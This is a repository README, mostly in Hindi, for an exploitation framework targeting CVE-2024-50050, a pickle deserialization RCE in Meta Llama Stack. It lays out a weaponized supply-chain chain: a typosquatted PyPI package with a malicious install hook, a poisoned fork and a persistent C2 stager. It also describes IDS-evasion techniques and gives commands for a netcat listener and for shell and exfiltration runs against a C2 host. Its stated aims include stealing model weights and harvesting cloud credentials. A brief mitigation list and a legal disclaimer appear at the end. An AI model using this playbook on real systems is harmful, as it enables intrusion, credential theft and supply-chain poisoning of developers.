
LlamaStack-RCE: Deterministic Supply Chain Exploitation & Hardening Framework [CVE-2024-50050] Focus on AI Security Research AI-SupplyChain-Poisoning: Advanced PVM Opcode Manipulation & ZeroMQ Injection Lab
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
LlamaStack-RCE एक उच्च-विश्वसनीयता सिमुलेशन और शोषण ढांचा है जो CVE-2024-50050 को लक्षित करता है, जो Meta Llama Stack में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है। यह भेद्यता Python-आधारित इन्फरेंस API के भीतर असुरक्षित डिसीरियलाइज़ेशन से उत्पन्न होती है, विशेष रूप से ZeroMQ (0MQ) परिवहन परतों पर pickle मॉड्यूल के उपयोग के माध्यम से।
यह रिपॉजिटरी पूर्ण आक्रमण श्रृंखला प्रदान करता है, ऊपरी-धारा आपूर्ति श्रृंखला विषाक्तीकरण से लेकर निचली-धारा निष्पादन और मॉडल वजन बहिर्वाह तक।
शोषण का केंद्र Pickle वर्चुअल मशीन (PVM) को लक्षित करता है। GLOBAL ऑपकोड का उपयोग करके, हम PVM को किसी भी उपलब्ध Python मॉड्यूल को आयात करने और unpickling प्रक्रिया के दौरान मनमाने फ़ंक्शन निष्पादित करने के लिए मजबूर कर सकते हैं।
आक्रमण वेक्टर: ZeroMQ Socket -> Raw Byte Stream -> pickle.loads() -> RCE.
पारंपरिक हस्ताक्षर-आधारित IDS (Snort/Suricata) को बायपास करने के लिए, ढांचा पॉलीमॉर्फिक एन्कोडिंग लागू करता है:
Base64 नेस्टेड निष्पादन: /bin/bash या os.system जैसे शाब्दिक स्ट्रिंग्स को छिपाने के लिए शेल कमांड को Base64 के भीतर समाहित करता है।
ऑपकोड अस्पष्टीकरण: निष्पादन तर्क को बदले बिना बाइनरी हस्ताक्षर बदलने के लिए PVM निर्देशों को पुनर्व्यवस्थित करता है।
पैकेट तस्करी: वॉल्यूम-आधारित विसंगति पहचान से बचने के लिए pickle पेलोड को कई ZeroMQ फ्रेम में विभाजित करता है।
ढांचा एक समग्र आपूर्ति श्रृंखला शस्त्रीकरण का अनुकरण करता है:
| चरण | रणनीति | तकनीकी कार्यान्वयन |
|---|---|---|
| I: ऊपरी-धारा | टाइपोस्क्वाटिंग | PyPI पर metalama-stack को setup.py में एक दुर्भावनापूर्ण PostInstallCommand के साथ पंजीकृत करना। |
|
| II: वितरण | विषाक्त फोर्क | GitHub पर एक "छिपा हुआ Pickle इंटरप्रेटर" युक्त connection.py के साथ उच्च-प्रदर्शन Llama Stack फोर्क।
|
| III: निष्पादन | CI/CD ट्रिगर | लक्ष्य के Jenkins/GitHub Actions वातावरण में pip install के दौरान स्वचालित निष्पादन।
| | IV: स्थायित्व | लॉजिक बम | दीर्घकालिक C2 पहुंच और मॉडल चोरी के लिए बहु-चरणीय पृष्ठभूमि स्टेजर।
|
हार्डवेयर: 4x NVIDIA A100/H100 (वजन के स्थानीय परीक्षण के लिए)।
OS: सख्त Arch Linux या Kali Linux।
वातावरण: Docker और Docker-Compose (पृथक नेटवर्क)।
.
├── lab_validator.py # 7-stage automated validation suite
├── exploit_cve_2024_50050.py # Main exploitation framework
├── server.py # Vulnerable Llama Stack simulation
├── setup.py # Weaponized supply chain installer
├── post_exploit.py # Data harvesting & lateral movement
└── evasion_library.py # 12+ advanced evasion methods
python lab_validator.py # Target: 100% Pass Rate
nc -lvnp 4444
python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python
python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil
सफल शोषण AI बुनियादी ढांचे पर पूर्ण नियंत्रण प्रदान करता है:
बौद्धिक संपदा चोरी: .safetensors मॉडल वजन की चोरी (मूल्य $10M - $100M+)।
GPU अपहरण: क्रिप्टोजैकिंग या शैडो ट्रेनिंग के लिए अनधिकृत CUDA संसाधन आवंटन।
अनुमान हेरफेर: डाउनस्ट्रीम अनुप्रयोगों (चिकित्सा/कानूनी AI) में प्रणालीगत विफलताओं का कारण बनने के लिए मॉडल प्रतिक्रियाओं को विषाक्त करना।
क्रेडेंशियल हार्वेस्टिंग: /proc/self/environ से AWS/GCP कुंजियाँ और K8s कॉन्फ़िगरेशन निकालना।
CVE-2024-50050 को कम करने के लिए, निम्नलिखित निरपेक्ष नियम लागू होने चाहिए:
Pickle को समाप्त करें: सभी pickle.loads() को safetensors.torch.load_file() या सख्त स्कीमा के साथ msgpack से बदलें।
ZMQ सख्तीकरण: सार्वजनिक/निजी कुंजी जोड़ों के साथ ZMQ_CURVE लागू करें और कभी भी 0.0.0.0 पर बाइंड न करें।
बुनियादी ढांचा अलगाव: RCE कंटेनर एस्केप को रोकने के लिए AI प्रक्रियाओं को gVisor या Kata Containers में चलाएं।
नेटवर्क सूक्ष्म-विभाजन: कड़ाई से परिभाषित इनग्रेस/एग्रेस नियमों का उपयोग करके इन्फरेंस सर्वर को सार्वजनिक इंटरनेट से अलग करें।
कानूनी सूचना: इस ढांचे का उपयोग पूर्व लिखित प्राधिकरण के बिना लक्ष्यों पर हमला करने के लिए अवैध है। यह केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है। लेखक (Sastra_Adi_Wiguna) दुरुपयोग के लिए कोई देयता स्वीकार नहीं करता है।
वर्गीकृत दस्तावेज़: PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 निर्धारणात्मक स्थिति: उत्पादन-तैयार (98/100)